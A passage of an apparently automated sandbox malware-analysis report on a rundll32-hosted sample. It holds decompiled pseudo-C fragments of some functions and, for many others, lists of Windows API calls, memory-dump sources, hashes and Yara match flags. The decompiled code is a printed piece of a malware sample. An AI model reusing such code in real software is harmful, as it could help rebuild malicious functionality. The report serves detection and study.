				intOrPtr _v12;
				signed int _v16;
				void _v156;
				void _v428;
				void* _t55;
				unsigned int _t56;
				signed int _t66;
				signed int _t74;
				void* _t76;
				signed int _t79;
				void* _t81;
				void* _t92;
				void* _t96;
				signed int* _t99;
				signed int _t101;
				signed int _t103;
				void* _t107;

				_t92 = _a12;
				_t101 = __eax;
				_t55 = E048913E0(_a16, _t92);
				_t79 = _t55;
				if(_t79 == 0) {
					L18:
					return _t55;
				}
				_t56 =  *(_t92 + _t79 * 4 - 4);
				_t81 = 0;
				_t96 = 0x20;
				if(_t56 == 0) {
					L4:
					_t97 = _t96 - _t81;
					_v12 = _t96 - _t81;
					E04897099(_t79,  &_v428);
					 *((intOrPtr*)(_t107 + _t101 * 4 - 0x1a8)) = E0489381E(_t101,  &_v428, _a8, _t96 - _t81);
					E0489381E(_t79,  &_v156, _a12, _t97);
					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x9c));
					_t66 = E04897099(_t101, 0x489a1d0);
					_t103 = _t101 - _t79;
					_a8 = _t103;
					if(_t103 < 0) {
						L17:
						E04897099(_a16, _a4);
						E04894191(_t79,  &_v428, _a4, _t97);
						memset( &_v428, 0, 0x10c);
						_t55 = memset( &_v156, 0, 0x84);
						goto L18;
					}
					_t99 = _t107 + (_t103 + _t79) * 4 - 0x1a8;
					do {
						if(_v8 != 0xffffffff) {
							_push(1);
							_push(0);
							_push(0);
							_push( *_t99);
							L048981CA();
							_t74 = _t66 +  *(_t99 - 4);
							asm("adc edx, esi");
							_push(0);
							_push(_v8 + 1);
							_push(_t92);
							_push(_t74);
							L048981C4();
							if(_t92 > 0 || _t74 > 0xffffffff) {
								_t74 = _t74 | 0xffffffff;
								_v16 = _v16 & 0x00000000;
							}
						} else {
							_t74 =  *_t99;
						}
						_t106 = _t107 + _a8 * 4 - 0x1a8;
						_a12 = _t74;
						_t76 = E04893ADE(_t79,  &_v156, _t92, _t107 + _a8 * 4 - 0x1a8, _t107 + _a8 * 4 - 0x1a8, _t74);
						while(1) {
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							L13:
							_t92 =  &_v156;
							if(E048940E5(_t79, _t92, _t106) < 0) {
								break;
							}
							L14:
							_a12 = _a12 + 1;
							_t76 = E04895908(_t79,  &_v156, _t106, _t106);
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							goto L13;
						}
						_a8 = _a8 - 1;
						_t66 = _a12;
						_t99 = _t99 - 4;
						 *(0x489a1d0 + _a8 * 4) = _t66;
					} while (_a8 >= 0);
					_t97 = _v12;
					goto L17;
				}
				while(_t81 < _t96) {
					_t81 = _t81 + 1;
					_t56 = _t56 >> 1;
					if(_t56 != 0) {
						continue;
					}
					goto L4;
				}
				goto L4;
			}





















                                          0x048935a5
                                          0x048935b1
                                          0x048935b7
                                          0x048935bc
                                          0x048935c0
                                          0x04893732
                                          0x04893736
                                          0x04893736
                                          0x048935c6
                                          0x048935ca
                                          0x048935ce
                                          0x048935d1
                                          0x048935dc
                                          0x048935e2
                                          0x048935e7
                                          0x048935ea
                                          0x04893604
                                          0x04893613
                                          0x0489361f
                                          0x04893629
                                          0x0489362e
                                          0x04893630
                                          0x04893633
                                          0x048936ea
                                          0x048936f0
                                          0x04893701
                                          0x04893714
                                          0x0489372a
                                          0x00000000
                                          0x0489372f
                                          0x0489363c
                                          0x04893643
                                          0x04893647
                                          0x0489364d
                                          0x0489364f
                                          0x04893651
                                          0x04893653
                                          0x04893655
                                          0x0489365f
                                          0x04893664
                                          0x04893666
                                          0x04893668
                                          0x04893669
                                          0x0489366a
                                          0x0489366b
                                          0x04893672
                                          0x04893679
                                          0x0489367c
                                          0x0489367c
                                          0x04893649
                                          0x04893649
                                          0x04893649
                                          0x04893684
                                          0x0489368c
                                          0x04893698
                                          0x0489369d
                                          0x0489369d
                                          0x048936a2
                                          0x00000000
                                          0x00000000
                                          0x048936a4
                                          0x048936a7
                                          0x048936b4
                                          0x00000000
                                          0x00000000
                                          0x048936b6
                                          0x048936b6
                                          0x048936c3
                                          0x0489369d
                                          0x048936a2
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x048936a2
                                          0x048936cd
                                          0x048936d0
                                          0x048936d3
                                          0x048936da
                                          0x048936da
                                          0x048936e7
                                          0x00000000
                                          0x048936e7
                                          0x048935d3
                                          0x048935d7
                                          0x048935d8
                                          0x048935da
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x048935da
                                          0x00000000

                                          APIs
                                          • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 04893655
                                          • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 0489366B
                                          • memset.NTDLL ref: 04893714
                                          • memset.NTDLL ref: 0489372A
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
                                          • Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: memset$_allmul_aulldiv
                                          • String ID:
                                          • API String ID: 3041852380-0
                                          • Opcode ID: 60f6cc77e61fb676e7b2c0148db9b80c06a535930dd2f8a4b6f5beff41048b38
                                          • Instruction ID: c12ae92ea3589d664b0bff70daf896d2fca7923dcd811edb0febeaba7cf59012
                                          • Opcode Fuzzy Hash: 60f6cc77e61fb676e7b2c0148db9b80c06a535930dd2f8a4b6f5beff41048b38
                                          • Instruction Fuzzy Hash: 12419071B00619AFEF119E6CCC40BDE77A5EF49714F044A69E819E7280EBB0BE449B91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B67073 Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                          Download Yara Rule
                                          APIs
                                          • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 00B67126
                                          • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 00B6713C
                                          • memset.NTDLL ref: 00B671E5
                                          • memset.NTDLL ref: 00B671FB
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: memset$_allmul_aulldiv
                                          • String ID:
                                          • API String ID: 3041852380-0
                                          • Opcode ID: 81002ac5c84b6cf1f8659534343273a57bc536d2cddc4f2a8a9a58bbf68a570e
                                          • Instruction ID: b3cd45880de4841736f1897e64654b7becf52113390fddb9da7864202195e24a
                                          • Opcode Fuzzy Hash: 81002ac5c84b6cf1f8659534343273a57bc536d2cddc4f2a8a9a58bbf68a570e
                                          • Instruction Fuzzy Hash: 7F41F431A00219AFDB20DF68CC81BEE77F5EF46714F1045AAF919A7281DF74AE458B90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B57F90 Relevance: 6.1, APIs: 4, Instructions: 119stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • StrRChrA.SHLWAPI(?,00000000,00000023), ref: 00B57FAA
                                          • StrChrA.SHLWAPI(?,0000005C), ref: 00B57FD1
                                          • lstrcpyn.KERNEL32(?,?,00000001,00000001), ref: 00B57FF7
                                          • lstrcpy.KERNEL32(?,?), ref: 00B5809B
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcpylstrcpyn
                                          • String ID:
                                          • API String ID: 4154805583-0
                                          • Opcode ID: 6eb3f6304e43a41f97df114672e01a75b2a25c929d294e0b2e664a79a85fb588
                                          • Instruction ID: cca4ef501500334815afe621158a66f56d92bdaed854b980c4964f5f3bb6186d
                                          • Opcode Fuzzy Hash: 6eb3f6304e43a41f97df114672e01a75b2a25c929d294e0b2e664a79a85fb588
                                          • Instruction Fuzzy Hash: A0412C76900119BFDB12DBA4DC88EEE7BFCEB09351F0544E6E905E7191DB349A48CB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B5DF40 Relevance: 6.1, APIs: 4, Instructions: 113COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _strupr
                                          • String ID:
                                          • API String ID: 3408778250-0
                                          • Opcode ID: f2bbf3d7ea1440f5915b1329417f4de79abab6089591520b901390d69dc40c37
                                          • Instruction ID: c212438b4fe00785802ad95c6f1992fb2f5f201bca01105b865505fb29c84c85
                                          • Opcode Fuzzy Hash: f2bbf3d7ea1440f5915b1329417f4de79abab6089591520b901390d69dc40c37
                                          • Instruction Fuzzy Hash: D241917284020D9EDB34DF64C889BAEB7E8FF14341F1549A5EC29D7161EB78D988CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B553AD Relevance: 6.1, APIs: 4, Instructions: 112COMMON
                                          Download Yara Rule
                                          APIs
                                          • ResetEvent.KERNEL32(?), ref: 00B553C3
                                          • GetLastError.KERNEL32 ref: 00B553DC
                                            • Part of subcall function 00B5E549: WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,00000000,?,?,?,00B72953,0000EA60,?,?,?,00B6C0C1,00000000,0000EA60,00000000), ref: 00B5E564
                                          • ResetEvent.KERNEL32(?), ref: 00B55455
                                          • GetLastError.KERNEL32 ref: 00B55470
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorEventLastReset$MultipleObjectsWait
                                          • String ID:
                                          • API String ID: 2394032930-0
                                          • Opcode ID: 47941985b1268e65d9a56df62aaa10e6905d728d7d0329f60d028d48006ff43e
                                          • Instruction ID: 1fd8dc4d8318c702e6d8307a7d0a80bb36ec147eb6eda618fd0da92ba709ea5d
                                          • Opcode Fuzzy Hash: 47941985b1268e65d9a56df62aaa10e6905d728d7d0329f60d028d48006ff43e
                                          • Instruction Fuzzy Hash: 1F31C632500A04ABDB319BA5CC54F6EB7FAEF84363F2445E4F91597290EB70E9899B10
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B6CF4E Relevance: 6.1, APIs: 4, Instructions: 105memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00B5FA32: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000100,?,00000000), ref: 00B5FA40
                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 00B6CFB6
                                          • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 00B6D007
                                            • Part of subcall function 00B53486: CreateFileW.KERNEL32(?,C0000000,0000FDE9,00000000,00000001,00000080,00000000,00000008,00000000,0000FDE9,?), ref: 00B534C6
                                            • Part of subcall function 00B53486: GetLastError.KERNEL32 ref: 00B534D0
                                            • Part of subcall function 00B53486: WaitForSingleObject.KERNEL32(000000C8), ref: 00B534F5
                                            • Part of subcall function 00B53486: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000001,00000080,00000000), ref: 00B53518
                                            • Part of subcall function 00B53486: SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00B53540
                                            • Part of subcall function 00B53486: WriteFile.KERNEL32(?,00001388,?,?,00000000), ref: 00B53555
                                            • Part of subcall function 00B53486: SetEndOfFile.KERNEL32(?), ref: 00B53562
                                            • Part of subcall function 00B53486: CloseHandle.KERNEL32(?), ref: 00B5357A
                                          • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,00000101,?,00000000,?,?,?,00000000,?,00000001), ref: 00B6D03C
                                          • HeapFree.KERNEL32(00000000,?,?,00000000,?,00000001,?,?,?,?,?,?,00B59EB6,?), ref: 00B6D04C
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: File$Heap$AllocateCreateFreeTime$CloseErrorHandleLastObjectPointerSingleSystemWaitWrite
                                          • String ID:
                                          • API String ID: 4200334623-0
                                          • Opcode ID: a50c20cdde36e51d561a336aebc311bb508127aaad8852f2792971c9ae8c0197
                                          • Instruction ID: ad99d3bc16bdb943b5cffe13afd810cf679ae294c292ca03610b213cbd692600
                                          • Opcode Fuzzy Hash: a50c20cdde36e51d561a336aebc311bb508127aaad8852f2792971c9ae8c0197
                                          • Instruction Fuzzy Hash: 76312C76A00015BFEB109FA4DC88CAABBBDEF09350B1044A5FA09D3160DB71AE91DB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B5E628 Relevance: 6.1, APIs: 4, Instructions: 92synchronizationCOMMON
                                          Download Yara Rule
                                          APIs
                                          • WaitForSingleObject.KERNEL32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000008,?,00000000,00000000), ref: 00B5E63F
                                          • SetEvent.KERNEL32(?,?,?,?,00B5D3E9,?,?), ref: 00B5E64F
                                          • GetLastError.KERNEL32 ref: 00B5E6D8
                                            • Part of subcall function 00B5E549: WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,00000000,?,?,?,00B72953,0000EA60,?,?,?,00B6C0C1,00000000,0000EA60,00000000), ref: 00B5E564
                                            • Part of subcall function 00B5C6B8: RtlFreeHeap.NTDLL(00000000,00000000,00B71A9A,00000000), ref: 00B5C6C4
                                          • GetLastError.KERNEL32(00000000), ref: 00B5E70D
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
                                          • String ID:
                                          • API String ID: 602384898-0
                                          • Opcode ID: 692670616c461f19b95c1e3b5d5ebb38e321e6646fc396bc9159ba34dce35402
                                          • Instruction ID: 46bee5c279cec5775c561423cb896c859d5ce65dfce7ced6e6dfad1fbe1ab2a9
                                          • Opcode Fuzzy Hash: 692670616c461f19b95c1e3b5d5ebb38e321e6646fc396bc9159ba34dce35402
                                          • Instruction Fuzzy Hash: BA31FDB5900309EFDB249FA5C884A9EB7F8EB08345F1049EAEA1693151D731EF489F10
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B693A7 Relevance: 6.1, APIs: 4, Instructions: 83COMMON
                                          Download Yara Rule
                                          APIs
                                          • TlsGetValue.KERNEL32(?), ref: 00B693D6
                                          • SetEvent.KERNEL32(?), ref: 00B69420
                                          • TlsSetValue.KERNEL32(00000001), ref: 00B6945A
                                          • TlsSetValue.KERNEL32(00000000), ref: 00B69476
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Value$Event
                                          • String ID:
                                          • API String ID: 3803239005-0
                                          • Opcode ID: c556e32e0bc8766f6a9c29e2b0960670b63c785b2f3947e431f60062fe8a56db
                                          • Instruction ID: a090806738598494c752c76daeb10371c048933768c040434551ccc63b7664b4
                                          • Opcode Fuzzy Hash: c556e32e0bc8766f6a9c29e2b0960670b63c785b2f3947e431f60062fe8a56db
                                          • Instruction Fuzzy Hash: F321AD72100204AFCB319F18DC85AAA7BF9FF41761B104464F456DBA60DB31DCA2DB40
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B5F3E5 Relevance: 6.1, APIs: 4, Instructions: 83memoryregistryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 00B5F43E
                                          • memcpy.NTDLL(00000018,?,?), ref: 00B5F467
                                          • RegisterWaitForSingleObject.KERNEL32(00000010,?,Function_0000C3EA,00000000,000000FF,00000008), ref: 00B5F4A6
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 00B5F4B9
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$AllocateFreeObjectRegisterSingleWaitmemcpy
                                          • String ID:
                                          • API String ID: 2780211928-0
                                          • Opcode ID: 10d2042a11a8ba6ab3347bdff62976440b15d288461cbc0d7c41d57e518fbfa8
                                          • Instruction ID: 4c2dcde1d94f377fe09cdbc0d1cd2b9d830fe287bba101fb8b363aa996a1a0de
                                          • Opcode Fuzzy Hash: 10d2042a11a8ba6ab3347bdff62976440b15d288461cbc0d7c41d57e518fbfa8
                                          • Instruction Fuzzy Hash: 67313E71200606AFDB209F28EC44FAA7BE9EF15361F008569FD1AD73A0DB74D955CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B57924 Relevance: 6.1, APIs: 4, Instructions: 82memorystringCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00B6F4A1: memcpy.NTDLL(00000000,00000110,?,?,00000000,00000000,00000000,?,?,?,00B5D3E9), ref: 00B6F4D7
                                            • Part of subcall function 00B6F4A1: memset.NTDLL ref: 00B6F54D
                                            • Part of subcall function 00B6F4A1: memset.NTDLL ref: 00B6F561
                                          • RtlAllocateHeap.NTDLL(00000000,00000008,-00000008), ref: 00B5797C
                                          • lstrcmpi.KERNEL32(00000000,?), ref: 00B579A3
                                          • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 00B579E8
                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,00000000,00000000), ref: 00B579F9
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$Freememset$Allocatelstrcmpimemcpy
                                          • String ID:
                                          • API String ID: 1065503980-0
                                          • Opcode ID: b500a1456c5bf51f03a4766e3e461169ed718ce1bccc07162234c29d348507f1
                                          • Instruction ID: 89d41ee3be149ca51d75c23ced27fb979fb27781df1c0d37ec96b4014c212b46
                                          • Opcode Fuzzy Hash: b500a1456c5bf51f03a4766e3e461169ed718ce1bccc07162234c29d348507f1
                                          • Instruction Fuzzy Hash: ED214B71A40209FFEF11AFA4EC85EAE7BF9EB04315F1044A5F909E7121DB359D988B60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B719D6 Relevance: 6.1, APIs: 4, Instructions: 77stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • memset.NTDLL ref: 00B71A05
                                          • lstrlen.KERNEL32(00000000), ref: 00B71A16
                                            • Part of subcall function 00B61C01: RtlAllocateHeap.NTDLL(00000000,00000001,00B71A23), ref: 00B61C0D
                                          • strcpy.NTDLL ref: 00B71A2D
                                          • StrChrA.SHLWAPI(00000000,0000003A,00000001), ref: 00B71A37
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateHeaplstrlenmemsetstrcpy
                                          • String ID:
                                          • API String ID: 528014985-0
                                          • Opcode ID: bad24dc50efe8148c23c67f80fab0bb0cca7d4924ca06cb0a1c289ce97df1efd
                                          • Instruction ID: 7df3e46a3d3db71e948def78d29371176b296b42a60f30ad7da0a7e65ccd40a7
                                          • Opcode Fuzzy Hash: bad24dc50efe8148c23c67f80fab0bb0cca7d4924ca06cb0a1c289ce97df1efd
                                          • Instruction Fuzzy Hash: DB21BE76141301AFD720AF6CDC89B6A77E8EB44311F04C859F97E87291EF75D8848B21
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 048951D7 Relevance: 6.1, APIs: 4, Instructions: 76sleepstringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 78%
                                          			E048951D7(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				intOrPtr _t26;
				intOrPtr* _t28;
				intOrPtr _t31;
				intOrPtr* _t32;
				void* _t39;
				int _t46;
				intOrPtr* _t47;
				int _t48;

				_t47 = __eax;
				_push( &_v12);
				_push(__eax);
				_t39 = 0;
				_t46 = 0;
				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
				_v8 = _t26;
				if(_t26 < 0) {
					L13:
					return _v8;
				}
				if(_v12 == 0) {
					Sleep(0xc8);
					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
				}
				if(_v8 >= _t39) {
					_t28 = _v12;
					if(_t28 != 0) {
						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
						_v8 = _t31;
						if(_t31 >= 0) {
							_t46 = lstrlenW(_v16);
							if(_t46 != 0) {
								_t46 = _t46 + 1;
								_t48 = _t46 + _t46;
								_t39 = E04894DF6(_t48);
								if(_t39 == 0) {
									_v8 = 0x8007000e;
								} else {
									memcpy(_t39, _v16, _t48);
								}
								__imp__#6(_v16);
							}
						}
						_t32 = _v12;
						 *((intOrPtr*)( *_t32 + 8))(_t32);
					}
					 *_a4 = _t39;
					 *_a8 = _t46 + _t46;
				}
				goto L13;
			}














                                          0x048951e3
                                          0x048951e7
                                          0x048951e8
                                          0x048951e9
                                          0x048951eb
                                          0x048951ed
                                          0x048951f0
                                          0x048951f5
                                          0x0489528c
                                          0x04895293
                                          0x04895293
                                          0x048951fe
                                          0x04895205
                                          0x04895215
                                          0x04895215
                                          0x0489521b
                                          0x0489521d
                                          0x04895222
                                          0x0489522b
                                          0x04895231
                                          0x04895236
                                          0x04895241
                                          0x04895245
                                          0x04895247
                                          0x04895248
                                          0x04895251
                                          0x04895255
                                          0x04895266
                                          0x04895257
                                          0x0489525c
                                          0x04895261
                                          0x04895270
                                          0x04895270
                                          0x04895245
                                          0x04895276
                                          0x0489527c
                                          0x0489527c
                                          0x04895285
                                          0x0489528a
                                          0x0489528a
                                          0x00000000

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
                                          • Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: FreeSleepStringlstrlenmemcpy
                                          • String ID:
                                          • API String ID: 1198164300-0
                                          • Opcode ID: f51ce2b3208f12643d902ae83645db388ad86e0f4b1096f78e09b5592d7a5c93
                                          • Instruction ID: 580d97a1dfa1e699f44d3afca15c35d40bf16656ac70dbf9d9549074b27d6e91
                                          • Opcode Fuzzy Hash: f51ce2b3208f12643d902ae83645db388ad86e0f4b1096f78e09b5592d7a5c93
                                          • Instruction Fuzzy Hash: 40212A76901609FFCF15DFE8D88499EBBF9EF48301B184669E901E7200EB70AE01CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B629F2 Relevance: 6.1, APIs: 4, Instructions: 75stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • memset.NTDLL ref: 00B62A14
                                          • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 00B62A58
                                          • OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 00B62A9B
                                          • CloseHandle.KERNEL32(?,?,?,?,00000000), ref: 00B62ABE
                                            • Part of subcall function 00B5BD6D: GetTickCount.KERNEL32 ref: 00B5BD7D
                                            • Part of subcall function 00B5BD6D: CreateFileW.KERNEL32(00000000,80000000,00000003,00B79208,00000003,00000000,00000000,?,?,00000000), ref: 00B5BD9A
                                            • Part of subcall function 00B5BD6D: GetFileSize.KERNEL32(?,00000000,?,00000001,?,?,00000000), ref: 00B5BDCD
                                            • Part of subcall function 00B5BD6D: CreateFileMappingA.KERNEL32(00000000,00B79208,00000002,00000000,00000000,?), ref: 00B5BDE1
                                            • Part of subcall function 00B5BD6D: lstrlen.KERNEL32(?,?,?,00000000), ref: 00B5BDFD
                                            • Part of subcall function 00B5BD6D: lstrcpy.KERNEL32(?,?), ref: 00B5BE0D
                                            • Part of subcall function 00B5BD6D: HeapFree.KERNEL32(00000000,?,?,?,00000000), ref: 00B5BE28
                                            • Part of subcall function 00B5BD6D: CloseHandle.KERNEL32(?,?), ref: 00B5BE3A
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: File$CloseCreateHandleMappinglstrlen$CountFreeHeapOpenSizeTicklstrcpymemset
                                          • String ID:
                                          • API String ID: 3239194699-0
                                          • Opcode ID: 239c6fb493e21f5c35ce8812290f3a86b44d53910bca08d30330bc2aa5dbd2ed
                                          • Instruction ID: ad3eea281d0a92316cbd50b15456e0abd16390aaa70f92d5db7aa3bebd3b22d1
                                          • Opcode Fuzzy Hash: 239c6fb493e21f5c35ce8812290f3a86b44d53910bca08d30330bc2aa5dbd2ed
                                          • Instruction Fuzzy Hash: 0E214A31500209EAEF21DFA5DD44EEE7BF8FF48355F140165F929A22A1EB74C94ACB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B7240D Relevance: 6.1, APIs: 4, Instructions: 75COMMON
                                          Download Yara Rule
                                          APIs
                                          • RtlEnterCriticalSection.NTDLL(0614C2D0), ref: 00B72423
                                          • RtlLeaveCriticalSection.NTDLL(0614C2D0), ref: 00B7243E
                                          • GetLastError.KERNEL32 ref: 00B724AC
                                          • GetLastError.KERNEL32 ref: 00B724BB
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CriticalErrorLastSection$EnterLeave
                                          • String ID:
                                          • API String ID: 2124651672-0
                                          • Opcode ID: 7395462d7115225acc7d16514dde916dc932129b90fd1c16bbe03011a4568f84
                                          • Instruction ID: 0807c51570cb14c74bbdadef76fdca89ee209bda0959660f12d30a6246b4619a
                                          • Opcode Fuzzy Hash: 7395462d7115225acc7d16514dde916dc932129b90fd1c16bbe03011a4568f84
                                          • Instruction Fuzzy Hash: 47215C36500609EFCB11DFA8DC44A9EBBF8FF08711F118155FA29A3290CB34DA55DB54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B6A17B Relevance: 6.1, APIs: 4, Instructions: 70fileCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00B53AEB: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,00000208,00000000,00000000,?,?,00B6A192), ref: 00B53B11
                                          • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,00001003,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00B6A1CD
                                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,00B5A61B,?), ref: 00B6A1DF
                                          • ReadFile.KERNEL32(?,?,00000004,?,00000000,?,?,?,?,?,00B5A61B,?), ref: 00B6A1F7
                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,00B5A61B,?), ref: 00B6A212
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
